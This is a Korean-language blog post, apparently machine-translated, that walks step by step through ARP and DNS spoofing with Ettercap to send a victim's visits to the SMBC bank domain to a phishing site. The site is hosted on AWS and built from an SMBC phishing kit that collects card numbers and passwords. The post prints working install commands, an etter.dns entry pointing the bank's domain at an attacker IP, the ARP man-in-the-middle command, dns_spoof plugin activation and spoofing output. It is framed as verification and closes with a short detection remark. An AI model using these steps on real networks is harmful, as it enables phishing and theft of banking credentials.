Ettercap으로 ARP 스푸핑

개요



이번에는 Ettercap이라는 해킹 도구를 사용하여 APR 스푸핑 + DNS 스푸핑을 시도했습니다.
ARP 스푸핑은 ARP 프로토콜의 통신을 가장하여 동일한 세그먼트의 장비가 되는 중간자 공격으로, DNS 스푸핑은 DNS 쿼리에 대한 요청을 다시 작성하는 중간자 공격입니다.
이후에서는, 이 수법을 이용해 피해 머신으로부터 정규의 SMBC에의 액세스를 사기 사이트에 유도하는 공격을 검증하고 있습니다.

준비



구성



검증을 위해 다음과 같은 구성 준비했습니다.
  • 공격 전


  • 공격 후



  • 공격용 머신 설정



    공격용 머신으로서 DNS 서버나 피해 머신과 같은 세그먼트 내에 설치되어 있는 CentoOS의 이하 버전의 머신을 이용하여 Ettercap을 설치했습니다. EPEL 리포지토리를 사용하면 YUM에서 쉽게 설치할 수있었습니다.

    /etc/redhat-release
    CentOS release 6.10 (Final)
    
    $ sudo yum -y install epel-release
    $ sudo yum -y install ettercap.x86_64
    

    Ettercap의 설정 파일에서 정규 사이트의 도메인과 개조 사이트의 IP 주소를 연결합니다.

    /etc/ettercap/etter.dns
    www.smbc.co.jp A 13.115.73.199
    smbc.co.jp A 13.115.73.199
    

    개조 사이트 준비



    AWS의 EC2에 주 1에서 만든 Docker 컨테이너를 준비하고 SMBC 용 Phishing ToolKit을 Apache의 DocumentRoot에 설치했습니다.

    검증 결과



    우선 피해 머신의 WEB 브라우저로 SMBC의 사이트 h tp // w w. smbc. 이. jp / pr / 그럼 x. php에 HTTP 액세스 해 봅니다. HTTP 액세스는 HTTPS로 리디렉션되어 버립니다만, 정규의 사이트에는 「/pr/index.php」에 유효한 컨텐츠가 놓여 있지 않기 때문에 이하와 같이 표시됩니다.



    그런 다음 공격 컴퓨터에서 다음 명령을 실행합니다.
    # ettercap -TqM arp:remote /192.168.1.132// /192.168.1.36//
    
    

    부팅 후 “h”를 누르면 Help가 표시됩니다.
    Text only Interface activated...
    Hit 'h' for inline help
    
    
    Inline help:
    
     [vV]      - change the visualization mode
     [pP]      - activate a plugin
     [fF]      - (de)activate a filter
     [lL]      - print the hosts list
     [oO]      - print the profiles list
     [cC]      - print the connections list
     [sS]      - print interfaces statistics
     [<space>] - stop/cont printing packets
     [qQ]      - quit
    

    사용할 플러그인을 선택하기 위해 "p"를 누르면 다음이 표시됩니다.
    Available plugins :
    
    [0]         arp_cop  1.1  Report suspicious ARP activity
    [0]         autoadd  1.2  Automatically add new victims in the target range
    [0]      chk_poison  1.1  Check if the poisoning had success
    [0]       dns_spoof  1.1  Sends spoofed dns replies
    [0]      dos_attack  1.0  Run a d.o.s. attack against an IP address
    [0]           dummy  3.0  A plugin template (for developers)
    [0]       find_conn  1.0  Search connections on a switched LAN
    [0]   find_ettercap  2.0  Try to find ettercap activity
    [0]         find_ip  1.0  Search an unused IP address in the subnet
    [0]          finger  1.6  Fingerprint a remote host
    [0]   finger_submit  1.0  Submit a fingerprint to ettercap's website
    [0]       gre_relay  1.0  Tunnel broker for redirected GRE tunnels
    [0]     gw_discover  1.0  Try to find the LAN gateway
    [0]         isolate  1.0  Isolate an host from the lan
    [0]       link_type  1.0  Check the link type (hub/switch)
    [0]      nbns_spoof  1.1  Sends spoof NBNS replies & sends SMB challenges with custom challenge
    [0]    pptp_chapms1  1.0  PPTP: Forces chapms-v1 from chapms-v2
    [0]      pptp_clear  1.0  PPTP: Tries to force cleartext tunnel
    [0]        pptp_pap  1.0  PPTP: Forces PAP authentication
    [0]      pptp_reneg  1.0  PPTP: Forces tunnel re-negotiation
    [0]      rand_flood  1.0  Flood the LAN with random MAC addresses
    [0]  remote_browser  1.2  Sends visited URLs to the browser
    [0]       reply_arp  1.0  Simple arp responder
    [0]    repoison_arp  1.0  Repoison after broadcast ARP
    [0]   scan_poisoner  1.0  Actively search other poisoners
    [0]  search_promisc  1.2  Search promisc NICs in the LAN
    [0]       smb_clear  1.0  Tries to force SMB cleartext auth
    [0]        smb_down  1.0  Tries to force SMB to not use NTLM2 key auth
    [0]    smurf_attack  1.0  Run a smurf attack against specified hosts
    [0]     stp_mangler  1.0  Become root of a switches spanning tree
    
    

    이번에는 dns_spoof 플러그인을 사용합니다.
    Plugin name (0 to quit): dns_spoof
    Activating dns_spoof plugin...
    
    

    이것으로 준비 완료입니다.
    다시 피해 머신의 WEB 브라우저에서 h tp // w w. smbc. 이. jp / pr / 그럼 x. php 에 HTTP 액세스하면 이번에는 카드 번호나 패스워드 등의 입력을 촉구하는 개조 사이트로 유도됩니다.



    Ettercap에서는 다음 용으로 출력됩니다.
    dns_spoof: [www.smbc.co.jp] spoofed to [13.115.73.199]
    dns_spoof: [www.smbc.co.jp] spoofed to [13.115.73.199]
    dns_spoof: [www.smbc.co.jp] spoofed to [13.115.73.199]
    dns_spoof: [www.smbc.co.jp] spoofed to [13.115.73.199]
    

    참조 자료



    주 1 : AWS에서 Apache Killer를 사용해보십시오.

    편집 후기



    Ettercap을 이용하면 쉽게 ARP 스푸핑을 할 수 있으므로 사내 네트워크에 부정한 단말기의 접속을 검출하는 것은 필수군요. 또한이 도구는 악용을 위해 사용하지 마십시오.

    좋은 웹페이지 즐겨찾기